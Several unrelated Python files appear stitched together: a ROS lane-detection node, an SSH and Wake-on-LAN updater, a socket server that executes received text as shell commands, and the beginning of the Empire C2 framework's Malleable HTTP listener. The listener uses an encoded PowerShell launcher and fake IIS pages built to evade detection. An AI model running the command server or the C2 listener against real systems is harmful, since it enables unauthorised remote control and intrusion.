        x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
        x[:,:,R] *= 1
        x[:,:,G] *= 0
        x[:,:,B] *= 0
        return x
    def yellow(x):
        # red + green = yellow
        x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
        x[:,:,R] *= 1
        x[:,:,G] *= 1
        x[:,:,B] *= 0
        return x
    h, w = area_white.shape
    orig = [area_white, area_red, area_yellow]
    masks = [white(area_white), red(area_red), yellow(area_yellow)]
    res = np.zeros((h,w,3), dtype=np.uint8)
    for i, m in enumerate(masks):
        # nz is 1.0 where this mask fires, 0.0 elsewhere
        nz = (orig[i] > 0) * 1.0
        assert nz.shape == (h, w), nz.shape
        for j in [0, 1, 2]:
            # blend: keep previous value where nz==0, take tinted mask where nz==1
            res[:,:,j] = (1-nz) * res[:,:,j].copy() + (nz) * m[:,:,j]
    return res
def canny_edge_median(self,img):
    """Canny edge detection with thresholds auto-derived from the median.

    The lower/upper thresholds are 0.66x / 1.33x the median pixel value,
    a common heuristic that adapts to overall image brightness.
    """
    med = np.median(img)
    lower = med * 0.66
    upper = med * 1.33
    return cv2.Canny(img, lower, upper)
def region_of_interest(self,img, vertices):
    """Keep only the part of `img` inside the polygon `vertices`.

    Everything outside the polygon is blacked out.
    Returns (masked_image, mask).
    """
    fill_value = 255
    polygon_mask = np.zeros_like(img)
    # paint the polygon interior white on the black mask
    cv2.fillPoly(polygon_mask, vertices, fill_value)
    # zero out every pixel of img that falls outside the polygon
    clipped = cv2.bitwise_and(img, polygon_mask)
    return clipped, polygon_mask
def highway_lane_lines(self,img,img_shape ):
    """
    Computes hough transform, separates lines on left and right side of the highway lane computed
    by hough transform, then forms a single line on the right side and left side

    Returns (left_side_line, right_side_line, lines) or (None, None, None)
    when Hough finds nothing.
    NOTE(review): not called from processImage_ in this file -- looks like a
    leftover of an earlier pipeline; confirm before removing.
    """
    # Computing lines with hough transform
    lines = self.hough_transform(img)
    if lines is None:
        return None,None,None
    # Removing horizontal lines detected from hough transform
    lane_lines = self.filter_horizontal_lines(lines)
    # Separating lines on left and right side of the highway lane
    left_lines, right_lines = self.separate_lines(lane_lines)
    # Filtering lines i.e. removing left lines that are closer to right side and vice versa
    left_lines, right_lines = self.filter_lane_lines(left_lines, right_lines,)
    # Computing one single line for left and right side
    left_side_line = self.draw_single_line(left_lines,img_shape )
    right_side_line = self.draw_single_line(right_lines,img_shape )
    return left_side_line, right_side_line,lines
    #return left_lines, right_lines,lane_lines
def hough_transform(self,img):
    """
    Computes lines using the probabilistic hough transform provided by OpenCV
    Thus it computes lines of finite size and returns them in form of an array
    :param img: masked edge detected image with only region of interest
    :return: array of segments shaped [[x1, y1, x2, y2]], or None if none found
    """
    # Parameters
    rho = 2 # distance resolution in pixels of the Hough grid
    theta = 1 * np.pi / 18 # angular resolution in radians of the Hough grid (10 degrees)
    threshold = 10 # minimum number of votes (intersections in Hough grid cell)
    min_line_length = 10 # minimum number of pixels making up a line
    max_line_gap = 15 # maximum gap in pixels between connectable line segments
    lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_length,
                            maxLineGap=max_line_gap)
    return lines
def filter_horizontal_lines(self,lines):
    """Remove near-horizontal segments (slope within +/-10 degrees).

    Lane lines are close to vertical from the front-mounted camera, so
    near-horizontal Hough segments are noise.

    :param lines: Hough output, array of [[x1, y1, x2, y2]], or None
    :return: numpy array of surviving segments, or None when `lines` is None

    Fix: the slope was computed as ``dy / 0.0001 * dx`` -- an operator
    precedence error that multiplies by dx instead of dividing, which kept
    horizontals (dy small but nonzero) and *removed* verticals (dx == 0
    makes the product 0).  The intended formula is ``dy / (dx + 0.0001)``,
    where the epsilon guards the division for vertical segments.
    """
    if lines is None:
        return
    non_horizontal_lines = [l for l in lines if
                            not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) / (float(l[0][2] - l[0][0]) + 0.0001))) <= 10]
    return np.array(non_horizontal_lines)
def separate_white_lines(self,lines):
    """Split white segments into (left, right) of the mean endpoint x.

    :param lines: list of (x1, y1, x2, y2) tuples, or None
    :return: (left_lines, right_lines) partitioned by each segment's x1
             against the mean x of all endpoints; None when `lines` is None

    Fix: the pivot was computed as ``sum(all endpoint x) / 2`` instead of
    the mean ``sum / (2 * len(lines))``; with more than one segment the
    pivot grew with the number of lines and everything was classified as
    "left".
    """
    if lines is None:
        return
    if len(lines) == 0:
        # matches the old behaviour for an empty input (pivot 0, two empties)
        return [], []
    total = 0
    for x1, y1, x2, y2 in lines:
        total += x1
        total += x2
    # mean x over both endpoints of every segment
    x_m = total / (2 * len(lines))
    right_lines = [l for l in lines if l[0] >= x_m]
    left_lines = [l for l in lines if l[0] < x_m]
    return left_lines,right_lines
def separate_lines(self,lines):
    """
    Separates the left and right lines of the highway lane
    :param lines: an array containing the lines which make left and right side of highway lane
    :return: (left_lines, right_lines) as lists of (x1, y1, x2, y2) tuples

    Fix: slope was computed as ``dy / 0.0001 + dx`` -- precedence bug that
    adds dx to a huge dy/0.0001 term, so the sign (and thus the left/right
    split) was wrong whenever dy was small.  Intended: ``dy / (dx + 0.0001)``
    with the epsilon guarding vertical segments.
    """
    left_lines = []
    right_lines = []
    # Here we separate coordinates of left and right-side lines of the highway lane
    # Since the y-axis is positive in downwards direction and x-axis is positive in right hand direction
    # With origin at the top left corner of the image
    # A negative slope will mean that the line is on the left ( in normal coordinate system it
    # will mean on the right side)
    # A positive slope will mean that the line is on the right ( in normal coordinate system it
    # will mean on the left side)
    for l in lines:
        slope = float(l[0][3] - l[0][1]) / (float(l[0][2] - l[0][0]) + 0.0001)
        if slope < 0:
            # Slope is negative hence line is on the left side
            left_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
        elif slope > 0:
            # Slope is positive hence line is on the right side
            right_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
        else:
            # exactly horizontal segments should have been filtered already
            print("Something looks fishy here")
    return left_lines, right_lines
def filter_lane_lines(self,left_lines, right_lines):
    """
    This function removes lines from left_lines that are closer to the right-side of the highway lane
    and from right_lines removes lines that are closer to left-side of highway lane. It also removes
    the lines which are more or less than 10 degrees from the median slope of each side.

    NOTE(review): the slope windows are asymmetric (-1..+10 deg around the
    left median, -5..+5 around the right) -- presumably hand-tuned; confirm.
    NOTE(review): (y2 - y1) / (x2 - x1) on integer coordinates floor-divides
    under Python 2 (this file targets Python 2) -- confirm that is intended.
    """
    if len(left_lines) == 0 or len(right_lines) == 0:
        return left_lines, right_lines
    # Filtering lines that lie close to the other side, for instance
    # lines in left_lines array that are closer to the right lane line
    # (left lines whose top x2 is right of the median top x are dropped)
    x_top_left = []
    for x1, y1, x2, y2 in left_lines:
        x_top_left += [x2]
    x_top_left_median = np.median(x_top_left)
    left_lines_final = [l for l in left_lines if l[2] <= x_top_left_median]
    slope_left_lines = []
    for x1, y1, x2, y2 in left_lines_final:
        slope_left_lines += [np.rad2deg(np.arctan((y2 - y1) / (x2 - x1)))]
    # same for the right side, keyed on the bottom x1 endpoint
    x_top_right = []
    for x1, y1, x2, y2 in right_lines:
        x_top_right += [x1]
    x_top_right_median = np.median(x_top_right)
    right_lines_final = [l for l in right_lines if l[0] >= x_top_right_median]
    slope_right_lines = []
    for x1, y1, x2, y2 in right_lines_final:
        slope_right_lines += [np.rad2deg(np.arctan((y2 - y1)/(x2 - x1)))]
    # Filtering based on slope: keep lines near the per-side median slope
    median_left_lines_slope = np.median(slope_left_lines)
    left_lines_final_filtered = []
    for i in range(len(left_lines_final)):
        if (-1 + median_left_lines_slope) <= slope_left_lines[i] <= (10 + median_left_lines_slope):
            left_lines_final_filtered += [left_lines_final[i]]
    median_right_lines_slope = np.median(slope_right_lines)
    right_lines_final_filtered = []
    for i in range(len(right_lines_final)):
        if (-5 + median_right_lines_slope) <= slope_right_lines[i] <= (5 + median_right_lines_slope):
            right_lines_final_filtered += [right_lines_final[i]]
    return left_lines_final_filtered, right_lines_final_filtered
def draw_single_line(self,lines,img_shape):
    """Fuse several segments into one line spanning the region of interest.

    Each segment is extrapolated to the ROI's top (y_min) and bottom (y_max)
    rows; the median of the resulting x coordinates gives the fused line.

    :param lines: list of (x1, y1, x2, y2) tuples
    :param img_shape: (height, width) of the source image
    :return: [x_bottom, y_max, x_top, y_min], or None for an empty input

    Fix: ``np.int`` was removed in NumPy 1.24; the builtin ``int`` is the
    drop-in replacement.
    NOTE(review): a perfectly horizontal segment (m == 0) would raise
    ZeroDivisionError here; upstream filters are assumed to prevent that.
    """
    if len(lines) == 0:
        return None
    # Maximum and minimum y-coordinate for the single line on left and right side
    y_max = int(img_shape[0] - img_shape[0] * self.height_from_bottom)
    y_min = int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)
    # Computing the top and bottom x co-ordinate obtained by extrapolating
    # the limited length lines.
    x_top = []
    x_bottom = []
    for x1, y1, x2, y2 in lines:
        # first-degree fit: y = m*x + c through the segment's endpoints
        z = np.polyfit([x1, x2], [y1, y2], 1)
        m, c = z
        x_top.append(int((y_min - c) / m))
        x_bottom.append(int((y_max - c) / m))
    x_avg_top = int(np.median(x_top))
    x_avg_bottom = int(np.median(x_bottom))
    return [x_avg_bottom, y_max, x_avg_top, y_min]
## STOP ##
def draw_single_red_line(self,lines):
    """Fuse red (stop-line) segments into one segment via median endpoints.

    Unlike draw_single_line there is no extrapolation: the fused segment is
    simply the per-coordinate median of the input endpoints.

    :param lines: list of (x1, y1, x2, y2) tuples
    :return: [x2_med, y2_med, x1_med, y1_med], or None for an empty input

    Fixes: removed an unused ``np.polyfit`` per segment (dead code that also
    warns on degenerate segments), and replaced the NumPy-1.24-removed
    ``np.int`` with the builtin ``int``.
    """
    if len(lines) == 0:
        return None
    x_top = []
    x_bottom = []
    y_top = []
    y_bottom = []
    for x1, y1, x2, y2 in lines:
        x_top.append(int(x1))
        x_bottom.append(int(x2))
        y_top.append(int(y1))
        y_bottom.append(int(y2))
    x_avg_top = int(np.median(x_top))
    x_avg_bottom = int(np.median(x_bottom)) #average
    y_avg_top = int(np.median(y_top))
    y_avg_bottom = int(np.median(y_bottom)) #average
    return [x_avg_bottom, y_avg_bottom, x_avg_top, y_avg_top]
def compute_mask_vertices(self,img_shape):
    """Build the trapezoidal region-of-interest polygon for `img_shape`.

    The trapezoid is parameterised by the relative widths/heights stored on
    self (bottom_width, top_width, height, height_from_bottom) and finally
    shifted horizontally by self.x_translation (fraction of image width).
    Returns a (1, 4, 2) int array of corner coordinates, ordered
    bottom-left, bottom-right, top-right, top-left.
    """
    h = img_shape[0]
    w = img_shape[1]
    # y rows of the trapezoid's bottom and top edges
    y_bottom = int(h - h * self.height_from_bottom)
    y_top = int(h - h * self.height_from_bottom) - int(h * self.height)
    # horizontal margins that centre each edge within the image
    margin_bottom = (w * (1 - self.bottom_width)) // 2
    margin_top = (w * (1 - self.top_width)) // 2
    corners = [[margin_bottom, y_bottom],
               [int(w * self.bottom_width) + margin_bottom, y_bottom],
               [int(w * self.top_width) + margin_top, y_top],
               [margin_top, y_top]]
    vertices = np.array([corners], dtype=np.int32)
    # shift the whole polygon along x by the configured fraction of the width
    return np.array(vertices[:] - [self.x_translation * w, 0], dtype='int')
def processImage(self, image_msg):
    """Process one frame, silently dropping it if one is already in flight."""
    # Non-blocking acquire: at most one frame is processed at a time and a
    # frame arriving mid-processing is discarded rather than queued.
    acquired = self.thread_lock.acquire(False)
    if not acquired:
        return
    try:
        self.processImage_(image_msg)
    finally:
        # always free the lock, even if the pipeline raised
        self.thread_lock.release()
def processImage_(self, image_msg):
    """Per-frame pipeline: decode, color-filter, edge-detect, fit the lane
    lines, then publish a LaneLines message and an annotated debug image.
    """
    # Decode from compressed image with OpenCV
    try:
        image_cv = image_cv_from_jpg(image_msg.data)
    except ValueError as e:
        self.loginfo('Could not decode image: %s' % e)
        return
    # Resize and crop image
    hei_original, wid_original = image_cv.shape[0:2]
    gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)
    # Applying gaussian blur
    blur = cv2.GaussianBlur(gray, (5, 5), 0)
    # color
    hsv = cv2.cvtColor(image_cv, cv2.COLOR_BGR2HSV)
    white, color_segments = self._colorFilter(hsv,'white') #hsv: white/black image color_segments: color space with color
    yellow, color_segments = self._colorFilter(hsv,'yellow')
    ## STOP ##
    red, color_segments = self._colorFilter(hsv,'red')
    # Computing edges
    img_edges = self.canny_edge_median(blur)
    # Computing region of interest
    img_shape = gray.shape
    my_vertices = self.compute_mask_vertices(img_shape)
    masked_image, mask = self.region_of_interest(img_edges, my_vertices)
    #bitwise edge, color, mask: keep only edges of the right color in the ROI
    edge_yellow = cv2.bitwise_and(yellow, masked_image)
    edge_white = cv2.bitwise_and(white, masked_image)
    ## STOP ##
    edge_red = cv2.bitwise_and(red, masked_image)
    # Computing lane lines
    right_white_line,left_white_line, white_lines = self.detectLines(edge_white,'white',img_shape) #the order of right and left have to exchange because the different coordinate of image frame and the normal frame
    yellow_line, yellow_lines = self.detectLines(edge_yellow,'yellow',img_shape)
    ## STOP ##
    red_line, red_lines = self.detectLines(edge_red,'red',img_shape)
    # handle two white line at same side
    # NOTE(review): if yellow_line is None the subscripting below raises
    # TypeError -- confirm yellow is guaranteed here.
    if left_white_line and right_white_line:
        if ((left_white_line[0]-left_white_line[2])/2 - (yellow_line[0]- yellow_line[2])/2) > 0:
            # average the two white lines into one
            # NOTE(review): relies on Python 2 map() returning a list
            right_white_line = map(lambda x: x/2, list(np.array(right_white_line)+np.array(left_white_line)))
            left_white_line = None
    # drop the white line when it is further than one lane width from yellow
    if yellow_line and right_white_line:
        if (yellow_line[0]+yellow_line[2]) - (right_white_line[0] +right_white_line[2]) > self.lanewidth:
            right_white_line = None
    # drop yellow when it appears to the right of the white line
    if yellow_line and right_white_line:
        if (yellow_line[0]+yellow_line[2]) > (right_white_line[0] +right_white_line[2]):
            yellow_line = None
    # SegmentList constructor
    segmentList = LaneLines()
    segmentList.header.stamp = image_msg.header.stamp
    image_with_lines = np.copy(image_cv)
    # draw line on image_With_line and collect the segment messages
    if yellow_line is not None:
        cv2.line(image_with_lines, (yellow_line[0], yellow_line[1]), (yellow_line[2], yellow_line[3]), (0, 255, 0), 5)
        self.hasleft = True
        segmentList.lanelines.extend(self.toSegmentMsg(yellow_line,LaneLine.LEFT))
    if right_white_line is not None:
        cv2.line(image_with_lines, (right_white_line[0], right_white_line[1]), (right_white_line[2], right_white_line[3]), (0, 0, 255), 5)
        self.hasright = True
        segmentList.lanelines.extend(self.toSegmentMsg(right_white_line,LaneLine.RIGHT))
    ## STOP#
    if red_line is not None:
        segmentList.lanelines.extend(self.toSegmentMsg(red_line,LaneLine.STOP))
        cv2.line(image_with_lines, (red_line[0],red_line[1]), (red_line[2], red_line[3]), (0, 255, 0), 5)
    # Publish segmentList
    self.pub_lines.publish(segmentList)
    # plot on image_With_line: raw Hough segments in blue for debugging
    if white_lines is not None:
        for i,pl in enumerate(white_lines):
            cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
    if yellow_lines is not None:
        for i,pl in enumerate(yellow_lines):
            cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
    # disabled lane-center visualisation (references undefined final_*_line)
    '''
    if self.hasleft and self.hasright:
        self.center[0] = (final_left_line[0]+final_right_line[0]+final_left_line[2] +final_right_line[2])/4
        self.center[1] = (final_left_line[1]+final_right_line[1]+final_left_line[3] +final_right_line[3])/4
        cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
        self.hasleft = False
        self.hasright = False
    if self.hasleft and not self.hasright:
        self.center[0] = (final_left_line[0]+final_left_line[2] )/2 + self.lanewidth/2
        self.center[1] = (final_left_line[1]+final_left_line[3] )/2
        cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
        self.hasleft = False
        self.hasright = False
    if not self.hasleft and self.hasright:
        self.center[0] = (final_right_line[0]+final_right_line[2] )/2 - self.lanewidth/2
        self.center[1] = (final_right_line[1]+final_right_line[3] )/2
        cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
        self.hasleft = False
        self.hasright = False
    '''
    # outline the region of interest
    cv2.polylines(image_with_lines,my_vertices,True,(0,255,255))
    # Publish the frame with lines
    image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
    image_msg_out.header.stamp = image_msg.header.stamp
    self.pub_image.publish(image_msg_out)
def toSegmentMsg(self, line, side):
    """Wrap one [x1, y1, x2, y2] line into a single-element LaneLine list.

    `side` is one of the LaneLine.LEFT / RIGHT / STOP constants.
    """
    segment = LaneLine()
    segment.side = side
    # endpoint 0 = (x1, y1), endpoint 1 = (x2, y2)
    segment.pixels_line[0].x = line[0]
    segment.pixels_line[0].y = line[1]
    segment.pixels_line[1].x = line[2]
    segment.pixels_line[1].y = line[3]
    return [segment]
def onShutdown(self):
    """rospy shutdown hook: just log that the node is exiting."""
    self.loginfo("Shutdown.")
if __name__ == '__main__':
    # Standard ROS node boilerplate: register, construct, hook shutdown, spin.
    rospy.init_node('line_detector',anonymous=False)
    line_detector_node = LineDetectorNode()
    rospy.on_shutdown(line_detector_node.onShutdown)
    rospy.spin()
|
Update_Internal_Remotly.py | from wakeonlan import send_magic_packet
from fabric import Connection
import marshal
import types
import threading
from queue import Queue
import socket
import time
import base64
import sys
import paramiko.ssh_exception
def starting_module(c_q):
    """Wake the target server via Wake-on-LAN, wait for SSH, push the script.

    Runs on a worker thread.  Result codes posted to `c_q`:
      1 = success, 2 = configs.pyc missing, 3 = DNS lookup failed,
      4 = magic packet failed, 5 = server never came up, 6 = transfer failed.

    Fixes: the two bare ``except:`` clauses are narrowed, the configs.pyc
    handle is closed after use, and unused ``error = err`` locals removed.
    """
    print("###########################################")
    print("## UPDATE INTERNAL - V3.0 ##")
    print("## AUTHOR - MAFIOSI ##")
    print("###########################################")
    print()
    print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING")
    time.sleep(2)
    print()
    print("[STATE] Checking file configs.pyc availability....")
    try:
        s = open('configs.pyc', 'rb')
        print("[RESULT] File configs.pyc found")
        print()
    except OSError:
        # narrowed from a bare except: only a missing/unreadable file means
        # "move the file next to the executable"
        print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE")
        c_q.put(2)
        return
    # configs.pyc is a compiled module: skip the pyc header, unmarshal, and
    # exec the code object to obtain the credential store.
    # NOTE(review): a 12-byte header matches Python 3.3-3.6 pyc files; 3.7+
    # uses 16 bytes -- confirm against the interpreter that built configs.pyc.
    # SECURITY NOTE: exec'ing marshalled code is only acceptable because the
    # file is produced by the same author; never point this at untrusted input.
    s.seek(12)
    olives = marshal.load(s)
    s.close()  # fix: handle was previously leaked
    garden = types.ModuleType("Garden")
    exec(olives,garden.__dict__)
    # decoded secrets: alpha=user, beta=password, gamma=host, delta=MAC address
    alpha = base64.decodebytes(bytes(garden.pick(1)))
    beta = base64.decodebytes(bytes(garden.pick(2)))
    gamma = base64.decodebytes(bytes(garden.pick(3)))
    delta = base64.decodebytes(bytes(garden.pick(4)))
    x = 9  # Wake-on-LAN UDP port
    alpha = alpha.decode()
    beta = beta.decode()
    gamma = gamma.decode()
    delta = delta.decode()
    # CONNECTION VARIABLES
    server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta})
    # NOTE(review): `command` is never used in this function -- kept as
    # documentation of the remote start command; confirm before deleting.
    command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &'
    # TIME PC TAKES TO TURN ON
    zzz = 50
    verify = False
    ##########################################
    ##########     MAIN PROGRAM     ##########
    ##########################################
    while True:
        print('[STATE] Looking up server info...')
        try:
            time.sleep(1)
            i = socket.gethostbyname(gamma)
            time.sleep(1)
            print('[RESULT] Server OK')
            print()
        except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException):
            print("[RESULT] Server info could not be retrieved, try again later")
            c_q.put(3)
            return
        # TELLS PC TO TURN ON
        print('[STATE] Checking if Server is ON...')
        try:
            send_magic_packet(delta, ip_address=i, port=x)
        except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException):
            print("[RESULT] Server cannot be turned ON, try again later")
            c_q.put(4)
            return
        # CHECKS IF PC IS ALREADY ON AND CONNECTS
        try:
            server.run('ls', hide=True)
            verify = server.is_connected
        except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException):
            print("[RESULT] Server is turned off --> Turning it ON...")
        if not verify:
            print("[ACTION] Sending Magic Packets")
            print("[ACTION] Waiting for Server to turn ON. ETA: ~60 sec")
            print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)")
            time.sleep(zzz)
            try:
                server.run('ls', hide=True)
                verify = server.is_connected
                if verify:
                    print("[RESULT] Server is turned ON")
                    print()
                else:
                    print("[RESULT] Server cannot be turned ON, try again later")
                    c_q.put(5)
                    return
            except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException):
                print("[RESULT] Server cannot be turned ON, try again later")
                c_q.put(5)
                return
        else:
            print("[RESULT] Server is Turned ON")
            print()
        # TRY TO TRANSFER FILES TO PC
        # MODDED - server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager.py', '/opt/scripts')
        # VANILLA - server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager_vanilla.py', '/opt/scripts')
        print("[STATE] Transferring Files")
        try:
            server.put('D:\Projects\Minecraft_Server_Management\Source_Code\Internal_Manager\Internal_MManager.py', '/opt/scripts')
            print("[RESULT] Files Transferred Sucessfully")
            print()
            c_q.put(1)
            break
        except Exception:
            # narrowed from a bare except; any SFTP failure is error code 6
            print("[RESULT] Files could not be transferred")
            c_q.put(6)
            break
    return
##########################################
########## MAIN ROUTINE ##########
##########################################
def main():
    """Start the updater worker and report its final status on stdout."""
    sys.tracebacklimit = None
    outcome_queue = Queue()
    worker = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(outcome_queue,))
    worker.start()
    # Block until the worker posts its result code; 1 means success,
    # anything else is one of starting_module's numbered error codes.
    state = outcome_queue.get()
    if state == 1:
        print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM')
    else:
        print("ERROR: " + str(state))
        print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)')
    # leave the message on screen for a moment before the console closes
    time.sleep(8)
if __name__ == '__main__':
    # script entry point
    main()
servers.py | # -*- coding: utf-8 -*-
# @Time : 2018/12/14 9:11
# @Author : Xiao
import socket,subprocess,struct,json,threading,time
# listening address and backlog size
ip_port= ("127.0.0.1",8081)
max_connect = 1
# TCP server socket; SO_REUSEADDR lets the script rebind quickly after restart
server_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
server_socket.bind(ip_port)
server_socket.listen(max_connect)
print("starting....")
def client_conn(conn):
    """Serve one client: receive a command line, run it, send the output back.

    Wire format per response: 4-byte packed length of a JSON header
    ({"file_size": N}), the JSON header bytes, then N bytes of output
    (stderr if the command failed, stdout otherwise).
    WARNING: this executes whatever the peer sends through a shell
    (subprocess with shell=True) -- it is a remote command execution
    service; never expose it beyond a trusted loopback/test setup.
    """
    while True:
        try:
            rec = conn.recv(1024)
            if not rec: break # peer closed the connection gracefully -- seen on Linux
            res = subprocess.Popen(rec.decode("utf-8"), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
            err = res.stderr.read()
            out = res.stdout.read()
            # prefer stderr so the client sees failures
            datas = err if err else out
            header = {"file_size": len(datas)}
            header_bytes = bytes(json.dumps(header), encoding='utf-8')
            header_len_bytes = struct.pack("i", len(header_bytes))
            conn.send(header_len_bytes)
            conn.send(header_bytes)
            conn.send(datas)
        except Exception as e:
            print(conn,e)
            break # peer dropped the connection abruptly -- seen on Windows
    conn.close()
# Multi-threaded accept loop: one worker thread per connected client, so
# several clients can be served at the same time.
while True:
    conn, client_addr = server_socket.accept()
    t = threading.Thread(target=client_conn,args=(conn,))
    t.start()
# NOTE(review): unreachable -- the accept loop above never exits
server_socket.close()
http_malleable.py | from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import time
import urllib.parse
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, Response
from pydispatch import dispatcher
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import malleable
from empire.server.common import packets
from empire.server.common import templating
from empire.server.database import models
from empire.server.database.base import Session
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
    def __init__(self, mainMenu, params=None):
        """Empire HTTP[S] listener that follows a Malleable C2 profile.

        :param mainMenu: Empire main-menu object providing shared state
        :param params: accepted for interface compatibility; not read here.
            Fix: the default was a mutable list ([]), which is the shared
            mutable-default pitfall -- changed to None (behaviour identical
            since the value is never used in this constructor).
        """
        # static module metadata displayed by Empire
        self.info = {
            'Name': 'HTTP[S] MALLEABLE',
            'Author': ['@harmj0y', '@johneiser'],
            'Description': ("Starts a http[s] listener (PowerShell or Python) that adheres to a Malleable C2 profile."),
            # categories - client_server, peer_to_peer, broadcast, third_party
            'Category' : ('client_server'),
            'Comments': []
        }
        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Name' : {
                'Description' : 'Name for the listener.',
                'Required' : True,
                'Value' : 'http_malleable'
            },
            'Host' : {
                'Description' : 'Hostname/IP for staging.',
                'Required' : True,
                'Value' : "http://%s:%s" % (helpers.lhost(), 80)
            },
            'BindIP' : {
                'Description' : 'The IP to bind to on the control server.',
                'Required' : True,
                'Value' : '0.0.0.0'
            },
            'Port' : {
                'Description' : 'Port for the listener.',
                'Required' : True,
                'Value' : 80
            },
            'Profile' : {
                'Description' : 'Malleable C2 profile to describe comms.',
                'Required' : True,
                'Value' : ''
            },
            'Launcher' : {
                'Description' : 'Launcher string.',
                'Required' : True,
                'Value' : 'powershell -noP -sta -w 1 -enc '
            },
            'StagingKey' : {
                'Description' : 'Staging key for initial agent negotiation.',
                'Required' : True,
                'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
            },
            'DefaultLostLimit' : {
                'Description' : 'Number of missed checkins before exiting',
                'Required' : True,
                'Value' : 60
            },
            'CertPath' : {
                'Description' : 'Certificate path for https listeners.',
                'Required' : False,
                'Value' : ''
            },
            'KillDate' : {
                'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
                'Required' : False,
                'Value' : ''
            },
            'WorkingHours' : {
                'Description' : 'Hours for the agent to operate (09:00-17:00).',
                'Required' : False,
                'Value' : ''
            },
            'Proxy' : {
                'Description' : 'Proxy to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'ProxyCreds' : {
                'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required' : False,
                'Value' : 'default'
            },
            'SlackURL' : {
                'Description' : 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
                'Required' : False,
                'Value' : ''
            }
        }
        # required:
        self.mainMenu = mainMenu
        self.threads = {} # used to keep track of any threaded instances of this server
        # optional/specific for this module
        self.app = None
        # randomize the length of the default_response and index_page headers to evade signature based scans
        self.header_offset = random.randint(0, 64)
        # set the default staging key to the controller db default
        self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
def default_response(self):
    """
    Returns an IIS 7.5 404 not found page.

    The page ends with `header_offset` trailing spaces so the byte length
    varies per listener instance (simple signature-scan evasion).
    """
    return '\r\n'.join([
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<head>',
        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
        '<title>404 - File or directory not found.</title>',
        '<style type="text/css">',
        '<!--',
        'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
        'fieldset{padding:0 15px 10px 15px;} ',
        'h1{font-size:2.4em;margin:0;color:#FFF;}',
        'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
        'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
        '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
        'background-color:#555555;}',
        '#content{margin:0 0 0 2%;position:relative;}',
        '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
        '-->',
        '</style>',
        '</head>',
        '<body>',
        '<div id="header"><h1>Server Error</h1></div>',
        '<div id="content">',
        ' <div class="content-container"><fieldset>',
        '  <h2>404 - File or directory not found.</h2>',
        '  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
        ' </fieldset></div>',
        '</div>',
        '</body>',
        '</html>',
        ' ' * self.header_offset, # randomize the length of the header to evade signature based detection
    ])
def method_not_allowed_page(self):
    """
    Imitates IIS 7.5 405 "method not allowed" page.

    Served when a request uses an HTTP verb the profile does not expect.
    """
    return '\r\n'.join([
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<head>',
